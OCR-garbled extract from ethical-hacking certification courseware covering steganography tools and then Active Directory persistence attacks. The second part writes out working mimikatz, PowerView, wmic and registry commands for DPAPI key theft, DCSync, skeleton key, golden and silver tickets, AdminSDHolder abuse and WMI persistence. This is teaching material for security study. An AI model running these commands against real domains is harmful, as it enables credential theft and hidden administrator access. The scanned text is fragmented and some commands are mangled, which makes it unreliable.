Exam 312-50 Certified Ethical Hacker
Some examples of document steganography tools are listed as follows:
=
Steg) (http://stegj.sourceforge.net)
=
Office XML (https://www.irongeek.com)
=
SNOW (http://www.darkside.com.au)
=
Data Stash (https://www.skyjuicesoftware.com)
=
Texto (http://www.eberl.net)
Video Steganography The image steganography discussed earlier can only hide a small amount of data inside image carrier files. Thus, image steganography can only be used when small amounts of data are to be hidden in the image files. However, one can use video steganography when it is necessary to hide large amounts of data inside carrier files. Video video .WMV, of the
steganography is a technique to hide any kind of file with any extension in a carrying file. The information is hidden in video files of different formats, such as .AVI, .MPG4, etc. Discrete cosine transform (DCT) manipulation is used to add secret data at the time transformation process of the video.
Video files carry the secret information from one end to another. This ensures greater security of your secret information. Numerous secret messages can be hidden in video files as every frame consists of both images and sound. As the carrier video file is a moving stream of images and sound, it is difficult for the unintended recipient to notice the distortion in the video file caused due to the secret message, and therefore, the message might go unobserved because of the continuous flow of the video. You can apply all the techniques available for image and audio steganography to video steganography. The information hidden in video files is nearly impossible to be recognized by the human eye, as the change in pixel color is also negligible. The following tools facilitate the hiding of secret information steganography: =
in running videos using video
OmniHide Pro Source: https://omnihide.com OmniHide
PRO
allows
you
to
hide
any
secret file within
an
innocuous
image,
video,
music file, etc. The user can use or share the resultant stego file like a normal file without anyone knowing the hidden content; thus, this tool enables you to save your secret file from prying eyes. It also enables you to add a password to hide your file and enhance security.
Module 06 Page 853
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
(@ OmnitidePro Trial v1.0
x
Hide
Hide your data from those
prying
Omni Hide! Recover Settings GoPro! About
Mack File
_[C\Users\AdministratorDesktoplslandpg
®
File To hide
C:\Users\AdministratorDownloadsifile_example_AVI
Output File
C:\Users\Administrator Desktop\isiand_Out jpg
(=)
1 View converted file when complete
2
on ®
m0
Ready.
Figure 6.170: Screenshot of OmniHide PRO Some examples of video steganography tools are as follows: =
RT Steganography (https://rtstegvideo.sourceforge.net)
=
StegoStick (https://sourceforge.net)
=
OpenPuff (https://embeddedsw.net)
=
MSU StegoVideo (http://www.compression.ru)
Audio Steganography In audio steganography, the user embeds the hidden messages in a digital sound format. Audio steganography allows you to conceal secret message within an audio file such as a WAV, AU, or even MP3 audio file. It embeds secret messages in audio files by slightly changing the binary sequence of the audio file. Changes in the audio file after insertion are not easily detectable, and in this way, the secret messages can be secured from prying ears. The carrier audio file should not be allowed to be distorted to avoid detection of hidden messages. Therefore, one should embed the secret data in such a way that a slight change in the audio file can go unnoticed upon listening. One can hide information in an audio file by replacing the LSB or by using frequencies that are not audible to the human ear (>20,000 Hz).
Module 06 Page 854
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
e
Audio File a.
tt .
.
“pr
Steg Tool
ts ron .
Stego Object
stog Too
Information
a
Information Figure 6.171: Audio steganography process
Audio Steganography Methods There are certain methods available to conceal your secret messages in audio files. Some methods implement an algorithm that relies on inserting the secret information in the form of a noise signal, while other methods believe in exploiting sophisticated signal-processing techniques to hide information. The following methods can be used to perform audio steganography to hide information: =
Echo Data Hiding In the echo data hiding method, you can embed the secret information in the carrier audio signal by introducing an echo into it. Three parameters of echo are used, namely initial amplitude, decay rate, and offset or delay, to hide the secret data. When the offset between the carrier signal and echo decreases, they combine at a certain point of time at which the human ear cannot distinguish between the two signals. At this point, you can hear an echo as an added resonance to the original signal. However, this point of indistinguishable sounds depends on factors such as quality of the original audio signal, type of sound, and listener acuity. To encode the resultant signal into binary form, two different delay times are used. These delay times should be below the level of human perception. Parameters such as decay rate and initial amplitude should also be set below threshold audible values so that the audio cannot be heard.
=
Spread Spectrum Method This method uses two versions of the spread spectrum: direct-sequence spectrum (DSSS) and frequency-hopping spread spectrum (FHSS).
spread
o
Direct-Sequence Spread Spectrum (DSSS): DSSS is a frequency modulation technique where a communication device spreads a signal of low bandwidth over a broad frequency range to enable the sharing of a single channel between multiple users. The DSSS steganography technique transposes the secret messages in radio wave frequencies. DSSS does introduce some random noise to the signal.
©
Frequency-Hopping Spread Spectrum (FHSS): In FHSS, the user alters the audio file’s frequency spectrum so that it hops rapidly between frequencies. The spread spectrum method plays a significant role in secure communications, both commercial and military.
Module 06 Page 855
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
LSB Coding LSB encoding works similarly to the LSB insertion technique, in which users can insert a secret binary message in the least significant bit of each sampling point of the audio signal. This method allows one to hide enormous amounts of secret data. It is possible to use the last two significant bits to insert secret binary data, but at the risk of creating noise in the audio file. Its poor immunity to manipulation makes this method less adaptive. You can easily identify extra hidden data because of channel noise and resampling. Tone Insertion
This method involves embedding data in the audio signal by inserting low-power tones. These tones are not audible in the presence of significantly higher-power audio signals, and therefore the presence of the secret message is concealed. It is exceedingly difficult for an eavesdropper to detect the secret message from the audio signal. This method helps to avoid attacks such as low-pass filtering and bit truncation. The audio steganography software implements one of these audio steganography methods to embed the secret data in the audio files. Phase Encoding Phase coding is described as the phase in which an initial audio segment is substituted by a reference phase that represents the data. It encodes the secret message bits as phase shifts in the phase spectrum of a digital signal, achieving a soft encoding in terms of the signal-to-noise ratio.
Module 06 Page 856
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
Audio Steganography Tools There are many tools available on the market that can help to hide secret information in an audio file. The following are some examples of audio steganography tools to hide secret information in audio files: =
DeepSound
Source: http://jpinsoft.net DeepSound allows you to hide any secret data in audio files (WAV and FLAC). It also allows you to extract secret files directly from audio CD tracks. In addition, it can encrypt secret files, thereby enhancing security. DeepSound
-
2.0
*
,
Hide Data Inside Audio
éoe
Fd
Audio Converter
re)
Settings
+
Open carrier files
aa
Add secret files
Encode secret files
|
o
x
@
Help
Extract secret files
| Carrier audio files ;
© @ Q
= areape rurciiac
File
Dir
D:\Audio D:\Audio
D:\Audio
wmawma
Size (MB)
22.4 MB 25.9 MB 214 MB
Secret files in D:\Audio\WMA.wma:
Output audio file quality
© Low @ Normal
© High
Free space for secret files: 7.8MB
(emmy
&
_DasecretFiles\secretFilel pdf
3.4 MB
G
DA SecretFiles\SecretFile2.doc
0.2 MB
&
—_Da\secretFiles\secretFile3,jpg
Hiding File 1 Fle / Folder / Dove ust
é@
External Disk
© Shared Folder
3
More Tools
Figure 6.173: Screenshot of GiliSoft File Lock Pro
Some examples of folder steganography tools are listed as follows:
=
Folder Lock (https://www.newsoftwares.net)
=
Hide Folders 5 (https://fspro.net)
=
InvisibleSecrets (https://www.east-tec.com)
=
QuickCrypto (http://www.quickcrypto.com)
Module 06 Page 858
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
Spam/Email Steganography Spam/email steganography refers to the technique of sending secret messages by embedding them and hiding the embedded data in spam emails. Various military agencies supposedly use this technique with the help of steganography algorithms. You can use the Spam Mimic tool to hide a secret message in an email. Spam/Email Steganography Tool =
Spam Mimic
Source: https://www.spammimic.com Spam Mimic is spam “grammar” for a mimic engine by Peter Wayner. This encodes secret messages into innocent-looking spam emails. The encoder of this tool encodes the secret message as spam with a password, fake PGP, fake Russian, and space.
@ spammimic- encode €
©
>
x
+
viele ve
e shtml @ spammimiccom/encod
jimnic Encode
Decode Explanation
Credits
FAQ & Feedback
Terms Francais
HOW
DOES
CONTROL
og.
MMiimiag)
x
Gey
MAT HOW
Encode
Enter your short secret message: 12345678910
Encode
Alternate encodings:
* * * * *
Encode Encode Encode Encode Encode
as as as as as
spam with a password fake spreadsheetmaw fake PGP fake Russian space
Figure 6.174: Screenshot of Spam Mimic showing encoded process
Module 06 Page 859
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures ‘System Hacking
@ spommimic- encoded C
€
Exam 312-50 Certified Ethical Hacker
x
+
@ spammimic.com/encode.cgi
Encoded
Decode
Your message 12345678910 gets encoded into spam as:
Erisaien
Credits Geta
Feedback
Dear Colleague , Thank-you for your interest in our
newsletter ! If you no longer wish to receive our publications
ev
oe
WATCH NOW
CONTRO!
Encode
@
Led
HOW DOES
finnic
ys
.
Mail it
simply reply with a Subject: of "REMOVE" and you will
(Zap this message into your
Title being sent in compliance with Senate bill 2516
but it won't be sent until
mailer
immediately be removed from our club . This mail is
17 ; Section 306 . Do NOT confuse us with Internet scam
you click on Send)
or
oo
lartists ! Why work for somebody else when you can become
Francais
ido almost anything to avoid mailing their bills & nobody
‘You can copy the message
capitalize on this . WE will help YOU SELL MORE and
nD
ich in 30 DAYS . Have you ever noticed people will
is getting any younger . Well, now is your chance to
SELL MORE. You are guaranteed to succeed because we
lake all the risk. But don't believe us . MrJones
ECrG SD
CRO
Te
Otero)
cael
CTEES
of Florida tried us and says "Now I'm rich many more
o Rear
standing . Because the Internet operates on “Internet
# How to copy and paste aes a pant
things are possible” ! We are a BBB member in good
itime” you must hurry . Sign up a friend and you'll
get a discount of 10% ! Thank-you for your serious consideration of our offer !
aero
Figure 6.175: Screenshot of Spam Mimic showing encoded output
Other Types of Steganography =
Web Steganography: In web steganography, objects and uploads them to a web server.
=
DVD-ROM Steganography: In DVD-ROM steganography, the user embeds the content in audio and graphical data.
=
Natural Text Steganography: Natural text steganography is the process of converting sensitive information into user-definable free speech such as a play.
=
Hidden OS Steganography: Hidden OS steganography is the process of hiding one OS in another.
=
C++ Source-Code Steganography: set of tools in the files.
Module 06 Page 860
a user hides web
objects behind
other
In C++ source-code steganography, the user hides a
Ethical Hacking and Countermeasures Copyright © by EC-Cout
All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Steganography Tools for Mobile Phones Earlier, we discussed a wide range of applications/tools that can messages in various types of carrier media, such as images, audio, run on a variety of platforms of desktops or laptops only. However, apps available that act as steganography tools for mobile phones. apps to send their secret messages.
be useful in hiding secret video, and text. These tools there are also many mobile Mobile users can use these
Some steganography tools that run on mobile devices as follows:
.
Stegais
Source: https://play.google.com Stegais can hide a message taken by the camera.
in a selected image from the photo
library or in a photo
Stegais
Welcome to
STEGAIS
our steganography software for now. You can choose what type of message you want to hide inside image: Voice
Or you can go to reveal the message from your image:
Reveal the Message
For information about image choose: Image Analysis
Please read important inf formation about
|
*
www 4
Domain
Legitimate User
Controller a
ii Golden Ticket/ Silver Ticket
DPAPI
Skeleton Key
Figure 6.179: Illustration of a domain dominance attack
Listed below are the various techniques used by attackers to maintain domain dominance:
=
Remote code execution
=
Abusing the Data Protection API (DPAPI)
=
Malicious replication
=
Skeleton key attack
=
Golden ticket attack
=
Silver ticket attack
Module 06 Page 873
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
Remote Code Execution and Abusing DPAPI Remote Code Execution
CEH
Abusing DPAPI
|@ Attackers attempt to execute malicious code
on the target domain controller through CLI to launch a domain dominance attack
‘@_
The Windows domain controllers contain a master
@
Attackers attemptto obtain this master key from
key to decrypt DPAPI-protected files
the domain controller
Remote Code Execution Attackers attempt to execute malicious code on the target domain controller (DC) through CLI to launch a domain dominance attack. Using this technique, attackers hold persistence to perform malicious activities over time without being detected. Attackers follow the steps execution. =
below to perform
dominance
Create
a dummy process and user on the target DC using WMI:
wmic
/node:
/add
PiratedProcess
Du**Y01"
Here, PiratedProcess and Du*“y01 dummy process on the target user’s DC.
=
a domain
process
attack via remote
call
create
are the user ID and password
"net
code
user
of the planted
Once the user is created, add the user to the “Admins” group. PsExec.exe
"Admins"
\\
PiratedProcess
/add
-accepteula
net
localgroup
=
Navigate to Active Directory Users and Computers (ADUC) and identify the user created using the above command.
=
Open the properties window on the system and navigate to the “Member of” tab to verify the membership.
Module 06 Page 874
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
4
x
Securty Environment Sessions Remote control Remote Desktop Services Profile COM+ Attribute Editor General Address Profle Telephones Organization Published Certficates Password Replication Dialin Object Memberof Name
Domain Users
Add...
Primary group:
Active Directory Domain Services Folder
CEH.com/Users
Remove
Domain Users There is no need to change Primary group unless you have Macintosh clients or POSIX-compliant
applications
Figure 6.180: Screenshot showing InsertedUser Properties
After successfully adding a new user to the “Admins” credentials to hold persistence on the target DC.
group,
the
attacker
uses these
Abusing Data Protection API (DPAPI) DPAPI is a unified location in Windows environments where all the cryptographically secured files, passwords of browsers, and other critical data are stored. Windows domain controllers (DCs) contain a master key to decrypt DPAPI-protected files. Attackers often attempt to obtain this master key from the DC using any of the following methods. =
Run the following mimikatz command to recover the master key using the password of a compromised user: dpapi: :masterkey /in:"C:\Users\spotless .OFFENSE\AppData\Roaming\Microsoft\Protect\ S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-£901-40a1-
b691-84d7£647b8fe" /sid:S-1-5-21-2552734371-813931464-10506908071106 /password:******* /protected
Module 06 Page 875
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking =
Run the following command credentials: sekurlsa:
=
Exam 312-50 Certified Ethical Hacker to retrieve all local master keys with compromised admin
:dpapi
Run the following command to retrieve all backup master keys: lsadump:
:backupkeys
/system:dc01.offense.local
/export
Figure 6.181: Screenshot showing the output of the mimikatz tool Cross-check whether the secured master keys are obtained by navigating through the root location containing the mimikatz.exe file and check for file formats such as .der, .key, pvk., and -pfx. By obtaining a master key, the attacker can open any DPAPI-encrypted file from any device associated with the network and maintain persistence.
Module 06 Page 876
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Malicious Replication and Skeleton Key Attack Malicious Replication @
@
Itenables attackers to create an exact copy of user data using the admin credentials
Attackers often attempt to replicate sensitive accounts such as “krbtgt”
ig iE H
Skeleton Key Attack ‘@
Asskeleton key is a form of malware that attackers use to inject false credentials into domain controllers to create a
backdoor password
@ Itis amemory-resident virus that enablesan attacker to obtain a master passwordto validate themselves as a legitimate user in the domain
Copyright © by
Al Rights Reserved Reproduction i
Malicious Replication Malicious replication enables attackers to create an exact copy of user data using the admin credentials. This technique allows attackers to compromise other credentials and access accounts from a remote location. Attackers follow all the DCSync attack steps to replicate sensitive accounts such as “krbtgt,” which serves as a master key for signing Kerberos tickets. Attackers attempt malicious replication using the following command: Invoke-Mimikatz -command '"lsadump::dcsync /aser:\"
Module 06 Page 877
/domain:
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Figure 6.182: Screenshot showing the output of the mimikatz tool The above command generates NTML hashes of the given domain user.
Skeleton Key Attack A skeleton controllers attacker to This attack distinguish
key is a form of malware that attackers use to inject false credentials into domain (DCs) to create a backdoor password. It is a memory-resident virus that enables an obtain a master password to validate themselves as a legitimate user in the domain. necessitates domain administrator rights and DC access. This attack is difficult to from other standard user authentication methods, making it difficult to detect.
veseword
Installs malware to create backdoor and retrieves master
Domain Controller gives admin rights and master
=» “\p
password to the attacker
Domain Controller
Attacker
Figure 6.183: Illustration of a skeleton key attack
Module 06 Page 878
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Working of the Skeleton Key Attack This attack is straightforward and only requires the execution of misc: : skeleton on each DC using the following command: Invoke-Mimikatz -Command '"privilege::debug"
"misc::skeleton"'
-
Figure 6.184: Screenshot of mimikatz After executing the above command, the attacker can masquerade as any user with the default mimikatz credentials. Attackers also perform skeleton key attacks by patching the Local Security Authority Server Service (LSASS). Attackers leverage their access to the domain and install malware on the DCs. The malware auto-patches the LSASS, which produces a new skeleton key or master password that works for all the users. The error shown in the above screenshot is displayed if LSASS has already been patched with skeleton keys. Attackers can alternatively utilize the Empire tool, which contains a module that automates the process by running mimikatz entirely in memory and avoiding the binary from being dropped on the DC. powershell/persistence/misc/skeleton_key
nKey
misc/skeleton_key
misc ‘mimi
I
implant a PPLI ON
DOMAIN CONTROLLERS!
d
Figure 6.185: Screenshot showing the Empire skeleton key module Module 06 Page 879
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Here, running the execute command triggers the skeleton key attack. )
ted: Hostname: 685307
> execute
M732D8
WIN-PTELU2UO7KG. p
‘.mb.local
/ S-1-5-21-3737340914-20195942552413)
Figure 6.186: Screenshot showing the execution of a skeleton key attack in Empire
Module 06 Page 880
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Golden Ticket Attack
CE H
@ A golden ticket attack is a post-exploitation technique implemented by attackers to gain
complete control over the entire Active Directory (AD)
(@ Attackers forge Ticket Granting Tickets (TGTs) by
compromising a Key Distribution Service account (KRBTGT) to access various AD resources Domain Controller / Koc
& or
Aeicknr accesses scenes
Gathers the domain name and Qo sioand then impersonates the privileged user
XO)
Application Server
Golden Ticket Attack A golden ticket attack is a post-exploitation technique implemented by attackers to gain complete control over the entire AD. Attackers perform this attack by leveraging the Kerberos authentication protocol, using which they forge Ticket Granting Tickets (TGTs) by compromising a Key Distribution Service account (KRBTGT) to access various resources. This attack allows attackers to maintain persistence and obtain more information within the AD by masquerading as privileged users.
Sends a forged TGS request
a ceceeeeneecneteceentecteneeeanensueceaeeuseanaeaD TGS response
e
Domain Controller /
©
KDC
Gathers the
domain name and SID and then
Attacker accesses resources as a legitimate user
seeeeeeeeeees
weneeceeeeeeeeeeeesD Application Server
impersonates the
privileged user
Forges aTGS
ticket!
Figure 6.187: Illustration of a golden ticket attack
Module 06 Page 881
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Working of a Golden Ticket Attack Attackers initially compromise a valid user account either using phishing emails or by exploiting vulnerabilities or security misconfigurations. The steps involved in a golden ticket attack are as follows. 1.
Attackers obtain domain information such as the domain identifier (SID) using the whoami command.
2.
Then, attackers elevate their privileges to the domain’s administrator-level user account to steal the NTLM hash of KRBTGT. Attackers use mimikatz to perform a pass-the-hash attack or DCSync attack to steal KRBTGT’s password hash by executing the following command: lsadump::dcsync
3.
/domain:domain
name
name
and domain
security
/user:krbtgt
After obtaining the password hashes, attackers run the following mimikatz command to obtain a golden ticket by impersonating an administrator-level user. It allows the
attackers to access any resource, group, or domain in the environment. kerberos::golden /domain:domain value /id:value /user:username
name
/sid:SID
/rc4:KRBTGT
hash
Finally, attackers maintain persistence by setting the validity of the ticket.
Figure 6.188: Screenshot of mimikatz
Figure 6.189: Screenshot showing saved Kerberos tickets
Note: The final step can also be executed replication process.
Module 06 Page 882
by the NTLM
hashes obtained
from
a malicious
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
Silver Ticket Attack 01
|
Asilver ticket attack is a post-exploitation technique implemented by _anattacker to steal legitimate users’ credentials and create a fake
Kerberos Ticket Granting Service (TGS) ticket
02
TWintiate this attack, the attacker must have access to the credentials gathered from a local service account or the system's SAM database
03
Theattacker creates a forged Kerberos TGS ticket using the mimikatz tool to establish a connection with the target service Extracts the service account's NTLM hashes ‘Compro ed Machine
Gathers the domain @ pameand siv and then impersonates the privileged user ~artacker
‘Accesses resource asa legitimate user
Local Server
Q ceterstoes
Silver Ticket Attack A silver ticket attack is a post-exploitation technique implemented by an attacker to steal legitimate users’ credentials and create a fake Kerberos Ticket Granting Service (TGS) ticket. This attack allows an attacker to acquire permissions to only a single service in an application, unlike the golden ticket attack, in which the attackers acquire permissions over the entire AD. To initiate a silver ticket attack, the attacker must hold access to the credentials gathered from a local service account or the system’s SAM database. Then, the attacker forges or creates a silver ticket without any intermediary such as a domain controller (DC), which makes it easier for the attacker to intrude and become untraceable for monitoring solutions. The attacker initially compromises the target system through techniques such as phishing and vulnerability exploitation. On gaining access to a networked system, the attacker initiates the silver ticket attack by creating a false Kerberos silver ticket using the following steps:
=
The attacker obtains domain information such as the domain name and domain security identifier (SID) using the whoami command.
=
The attacker obtains other details of the service or service type they wish to target.
=
The attacker deploys password cracking tools such as mimikatz on the compromised system to extract the Kerberos service’s local NTLM password hash.
=
The attacker initiates offline password attacks such as Kerberoasting to obtain a raw or plaintext password for the service.
=
The attacker creates a forged or fake Kerberos TGS ticket using the mimikatz tool to establish a connection with the target service.
=
The attacker uses both the forged TGS and hash data to authenticate the local service as a legitimate user.
Module 06 Page 883
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking =
The attacker exploits TGS to elevate privileges and permissions.
Note: Privilege Attribute Certificate (PAC) validation request and PAC validation response are optional in a silver ticket attack.
Extracts the ser Compromised
Machine
Forged TGS + NTLM Gathers the domain name and SID and
then impersonates @ & |
Accesses resource as a legitimate user
| E Local Server
the privileged user ~ attacker Creates forged TGS ticket
Figure 6.190: Illustration of a silver ticket attack
If an attacker can successfully elevate privileges and obtain admin rights to execute code on a local machine, they can run the following command to retrieve the NTLM hashes of the AD system’s password:
mimikatz “privilege::debug” “sekurlsa::logonpasswords”
Figure 6.191: Screenshot of the mimikatz tool displaying the compromised system’s credentials
Module 06 Page 884
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Maintain Domain Persistence Through AdminSDHolder @
cE
AdminsDHolder is an object of Active Directory that protects user accounts and groups having high privileges against
accidental modifications of security permissions
@
Attackers having admin privileges ona compromised domain can abuse the SDProp process to establish persistence
‘@
Attackers can add a user account to the ACL
to gain “GenericAll” privileges, equivalent to the privileges of the domain administrator
Copyright © by
Al Rights Reserved. Reproduction is
Maintain Domain Persistence Through AdminSDHolder AdminSDHolder is an object of AD that protects user accounts and groups having high privileges against accidental modifications of security permissions. Frequently, the Security Descriptor Propagator (SDProp) process retrieves the access-control list (ACL) of AdminSDHolder that contains the default permissions for the accounts and groups. These default permissions are compared with the permissions of the highly privileged accounts to identify modifications and then overwritten with those defined in the ACL. Attackers having admin privileges on a compromised domain can abuse the SDProp process to establish persistence. Attackers can add a user account to the ACL to gain “GenericAll” privileges, equivalent to the domain administrator. Consequently, with the changes replicated every hour by SDProp, attackers can maintain persistence.
Establishing Domain Persistence by Abusing AdminSDHolder Use the following command to add a user account Martin to the ACL: Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' PrincipalSamAccountName Martin -Verbose -Rights All
Module 06 Page 885
-
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
al Help (c) Microsoft Corporation. All rights reserved
Users\Administ lcd C:\Windows\Syster
wnt
findows\System32
Wind
powershell Windows Powe copyright (C) Install
the
Microsoft Corporation.
ALl rights reserved
latest PowerShell for new features
and improvements! https
Windows\System32> cd C:\Users\Administrator Users’ nistrator ers\Administrator> cd C:\Users\Administrator\Downloads\PowerView Administ rator\Downloads\Power Administrator\Downloads\Power [Import-Module_./powerview.psm. Administrat Get-DomainSearcher search str DAP inSDHolder ,C Get-DomainSearcher search string: LDAP: //DC=CEH,D Granting principal S-1-5-21-2083413944-2693254119-1471166842-1104 AdminSDHolder , CNH, DC=com VERBOSE: Granting principal S-1-5-21-2083413944-2693254119-1471166842-1194 lpeoa00a0000 nSDHolder , CN=Syste Users\Administrator\Download
EH,D ‘ALL’
on
‘0000000 -000-0000-0000-6)
Figure 6.192: Screenshot of PowerShell showing the addition of a user account
The SDProp process retrieves the ACL to check whether the Martin account has “GenericAll” permissions: Get-ObjectAcl
-SamAccountName
"Martin”
-ResolveGUIDs
e le Edit Vie pove0000000 rights on CN=AdminSDHolder , CN=System,DC=CEH , DC=c PS C:\Users\Administrator\Downloads\Pow et-ObjectAcl -SamAccountName "Martin CN IidentityReference Inherited ActiveDirectoryRights Propagat ionFlags objectFlag ItnheritanceF lags ItnheritanceType AccessCont rol Type lobjectSID
ItnheritedObjectTyt fobjectoN Inherited lActiveDirectoryRights PropagationFlags objectFlags IinheritanceFlags ItnheritanceType lAccessControlType
NT AUTHORITY\SELF Fals : GenericRead None None None None Allow S-1-5-21-2083413944-2693254119- 147116
AU CN=Martin ers ,DC=CEH, DC ALL NT AUTHORITY\Authenticated Users Fals dcontro None None None
Figure 6.193: Screenshot of PowerShell showing GenericAlll privileges Module 06 Page 886
‘al Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Cou ntermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Additionally, the following command can be used to change the default time of SDProp to 3 min by modifying the registry: HKLM\SYSTEM\CurrentControlSet\Services\NTDS\ Parameters AdminSDProtectFrequency /T REG DWORD /F /D 300
REG
ADD
/v
Figure 6.194: Screenshot of PowerShell showing the modification of the registry The screenshot shows that the Martin permissions set.
account has been added to AdminSDHolder with all
AdminSDHolder Properties
2.
xX
General Object Securty Attrbute Editor or user names: Everyone
a
$82, Domain Admins (CEH\Domain Admins)
v
8 SELF 82 Authenticated Users SR SYSTEM
Bermissionsfor Martin J Fall control Read Write Create all child objects Delete all child objects For special pemmissions or advanced settings, click
Advanced
OK
Remove
oooooly
Add
fous
Cancel
Figure 6.195: Screenshot of AD users and computers in AdminSDHolder properties Module 06 Page 887
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Add the account Martin to the group Domain net
group
“Domain
Admins”
Martin
cessControlType lobjectSID
IdentityReference
/add
/domain
}944-2693254119- 1471161 A
InheritedObjectType
lobjecton object Type
Admins using the following command:
i
A
s,
DC=CEH, DC
BUILTIN\Administrator
TsInherited True DirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDa) er PropagationFlags None ctFla ritanceFlags InheritanceType i ontrolType 0 lobjectsiD 5-21-2083413944-2693254119- 1471166842-1104 IPS C:\Users\Administrator\Downloads\PowerView> REG ADD HK t\Services\NTDS\Pa rameters /V AdminSDProtectFrequency /T REG DWORD /F /D 3 REG ADD HKLM\SYSTEM\CurrentControlset es\NTDS\Parameters /V AdminSDProtectFrequency /T REG DWOR ID /F /D The operation completed successfully C:\Users\Administrator\Downloads\Pow jomain Admins" Martin /add /doma Inet group “Domain Admins” Martin /add /dom The command completed succ PS_C:\Users\Administrator\Downloads
Figure 6.196: Screenshot showing the output of adding a user account to a group Run the following command to check the accessibility of the domain which domain persistence is created: dir
controller (DC) through
\\10.10.1.22\c$ indows PowerShell
n>|dir
\\10.10.1
wamp' indow
Figure 6.197: Screenshot showing the accessibility of the DC Module 06 Page 888
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Maintaining Persistence Through WMI Event Subscription @ Attackers use Windows Management Instrumentation (WMI) event subscription to execute malicious content and maintain persistence on the target system
Using Command Prompt and PowerLurk
Using Wmi-Persistence
Copyright © by
Al Rights Reserved. Reproduction is
Maintaining Persistence Through WMI Event Subscription Attackers use Windows Management Instrumentation (WMI) event subscription to execute malicious content and maintain persistence on the target system. They use various scripts and techniques to exploit the features of WMI and perform event subscriptions for malicious events that, when triggered, initiate the execution of arbitrary code allowing attackers to maintain persistence. These scripts automate the process by hiding malicious payloads and maintaining sustainability even after rebooting/restarting the system. Techniques to Maintain Persistence Using WMI Event Subscription
=
Using Command Prompt The following wmic commands create a malicious namespace and subscription for the
events: o
wmic
/NAMESPACE:"\\root\subscription"
PATH
_ EventFilter
CREATE Name="EthicalHacker", EventNameSpace="root\cimv2",QueryLanguage="WQL",
Query="SELECT
* FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS System'" ©
wmic
/NAMESPACE:"\\root\subscription"
CommandLineEventConsumer
CREATE
PATH
Name="EthicalHacker",
ExecutablePath="C: \Windows\System32\ethicalhacker.exe" LineTemplate="C: \Windows\System32\thicalhacker.exe" ©
,Command
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"EthicalHacker\"", Consumer="CommandLineEventConsumer
Module 06 Page 889
.Name=\"EthicalHacker\""
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
